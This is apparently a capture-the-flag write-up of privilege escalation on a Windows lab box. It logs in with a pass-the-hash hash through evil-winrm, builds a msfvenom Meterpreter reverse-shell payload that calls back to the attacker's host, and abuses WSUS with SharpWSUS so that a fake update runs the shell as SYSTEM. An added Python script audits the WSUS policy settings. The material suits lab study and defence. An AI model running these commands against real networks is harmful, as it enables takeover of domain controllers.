Priv Esc

evil-winrm -i 10.10.11.175 -u sflowers -H 1FCDB1F6015DCB318CC77BB2BDA14DB5

*Evil-WinRM* PS C:\Users\sflowers> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
    SetActiveHours    REG_DWORD    0x1
    ActiveHoursStart    REG_DWORD    0x0
    ActiveHoursEnd    REG_DWORD    0x17
    AcceptTrustedPublisherCerts    REG_DWORD    0x1
    ExcludeWUDriversInQualityUpdate    REG_DWORD    0x1
    DoNotConnectToWindowsUpdateInternetLocations    REG_DWORD    0x1
    WUServer    REG_SZ    http://wsus.outdated.htb:8530
    WUStatusServer    REG_SZ    http://wsus.outdated.htb:8530
    UpdateServiceUrlAlternate    REG_SZ
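The registry query above is the security-relevant finding of this section: the host is policy-bound to an intranet WSUS server reached over plain HTTP, and AcceptTrustedPublisherCerts is set, so the update channel is not protected by TLS and clients will install intranet updates signed by any certificate in the Trusted Publishers store. The following Python script is an added audit example (not part of this writeup or of SharpWSUS): it parses the text that `reg query` prints for the WindowsUpdate policy key and flags those settings. The sample input is the output shown above, embedded verbatim so the script runs offline; the finding messages and thresholds are the example's own.

```python
"""Audit Windows Update policy values captured from `reg query` output.

Added example for this writeup (not the page's or SharpWSUS's own code).
It parses the text `reg query` prints for the WindowsUpdate policy key and
flags settings that weaken the client side of the WSUS trust model:
  * WSUS URLs that are not https (update traffic exposed to on-path tampering)
  * AcceptTrustedPublisherCerts=1 (intranet updates signed by any certificate
    in the Trusted Publishers store are accepted, not only Microsoft-signed ones)
"""
import re
from urllib.parse import urlparse

# Constructed sample: the registry output from the box, copied in so the
# script runs without access to a Windows host.
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
    SetActiveHours    REG_DWORD    0x1
    ActiveHoursStart    REG_DWORD    0x0
    ActiveHoursEnd    REG_DWORD    0x17
    AcceptTrustedPublisherCerts    REG_DWORD    0x1
    ExcludeWUDriversInQualityUpdate    REG_DWORD    0x1
    DoNotConnectToWindowsUpdateInternetLocations    REG_DWORD    0x1
    WUServer    REG_SZ    http://wsus.outdated.htb:8530
    WUStatusServer    REG_SZ    http://wsus.outdated.htb:8530
    UpdateServiceUrlAlternate    REG_SZ
"""

# A value line is indented: <name> <REG_TYPE> [<data>]; the key path line is not.
VALUE_RE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s*(.*)$")


def parse_reg_query(text):
    """Return {value_name: (reg_type, data)}; data is '' when reg query printed none."""
    values = {}
    for line in text.splitlines():
        m = VALUE_RE.match(line)
        if m:
            name, reg_type, data = m.groups()
            values[name] = (reg_type, data.strip())
    return values


def dword(values, name, default=0):
    """Read a REG_DWORD that reg query printed as hex (e.g. 0x17 -> 23)."""
    _, data = values.get(name, ("REG_DWORD", ""))
    return int(data, 16) if data else default


def audit_wsus_policy(values):
    """Return a list of finding strings; an empty list means nothing was flagged."""
    findings = []
    for key in ("WUServer", "WUStatusServer", "UpdateServiceUrlAlternate"):
        _, url = values.get(key, ("REG_SZ", ""))
        if not url:  # value absent or empty, nothing to check
            continue
        scheme = urlparse(url).scheme.lower()
        if scheme != "https":
            findings.append(
                f"{key} uses {scheme or 'no'} scheme ({url}): "
                "client update traffic is not protected by TLS"
            )
    if dword(values, "AcceptTrustedPublisherCerts") == 1:
        findings.append(
            "AcceptTrustedPublisherCerts=1: intranet updates signed by any "
            "Trusted Publishers certificate are accepted, not only Microsoft-signed ones"
        )
    return findings


if __name__ == "__main__":
    for finding in audit_wsus_policy(parse_reg_query(SAMPLE_REG_OUTPUT)):
        print("[!]", finding)
```

Note that the abuse shown later in this section runs with administrative rights on the WSUS server itself, so it does not depend on the HTTP transport; the audit flags these values because they are the settings a defender can harden (HTTPS on port 8531 and the AcceptTrustedPublisherCerts policy), while who can administer the WSUS server remains the controlling factor.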

adot@pwndot:~/opt$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 LPORT=4443 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes

adot@pwndot:~$ msfconsole -q -x 'use exploit/multi/handler;set LHOST tun0; set LPORT 4443; set payload windows/x64/meterpreter/reverse_tcp; run'
[*] Starting persistent handler(s)...
[*] Using configured payload generic/shell_reverse_tcp
LHOST => tun0
LPORT => 4443
payload => windows/x64/meterpreter/reverse_tcp
[*] Started reverse TCP handler on 10.10.14.18:4443

Compile SharpWSUS, upload it to the box together with PsExec and the shell.exe payload, then run it to create the update:

*Evil-WinRM* PS C:\Users\sflowers\Documents> .\sharpwsus.exe create /payload:"C:\programdata\psexec.exe" /args:"-accepteula -s -d C:\programdata\shell.exe" /title:"Pwned"

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Create Update
[*] Creating patch to use the following:
[*] Payload: psexec.exe
[*] Payload Path: C:\programdata\psexec.exe
[*] Arguments: -accepteula -s -d C:\programdata\shell.exe
[*] Arguments (HTML Encoded): -accepteula -s -d C:\programdata\shell.exe

################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
DC, 8530, c:\WSUS\WsusContent

ImportUpdate
Update Revision ID: 30
PrepareXMLtoClient
InjectURL2Download
DeploymentRevision
PrepareBundle
PrepareBundle Revision ID: 31
PrepareXMLBundletoClient
DeploymentRevision

[*] Update created - When ready to deploy use the following command:
[*] SharpWSUS.exe approve /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:Target.FQDN /groupname:"Group Name"

[*] To check on the update status use the following command:
[*] SharpWSUS.exe check /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:Target.FQDN

[*] To delete the update use the following command:
[*] SharpWSUS.exe delete /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:Target.FQDN /groupname:"Group Name"

[*] Create complete

*Evil-WinRM* PS C:\Users\sflowers\Documents> .\SharpWSUS.exe approve /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:DC.outdated.htb /groupname:"PwnedLOL"

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Approve Update

Targeting DC.outdated.htb
TargetComputer, ComputerID, TargetID
------------------------------------
DC.outdated.htb, bd6d57d0-5e6f-4e74-a789-35c8955299e1, 1
Group Exists = False
Group Created: PwnedLOL
Added Computer To Group
Approved Update

[*] Approve complete

*Evil-WinRM* PS C:\Users\sflowers\Documents> .\SharpWSUS.exe check /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:DC.outdated.htb /groupname:"PwnedLOL"

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Check Update

Targeting DC.outdated.htb
TargetComputer, ComputerID, TargetID
------------------------------------
DC.outdated.htb, bd6d57d0-5e6f-4e74-a789-35c8955299e1, 1

[*] Update is installed

[*] Check complete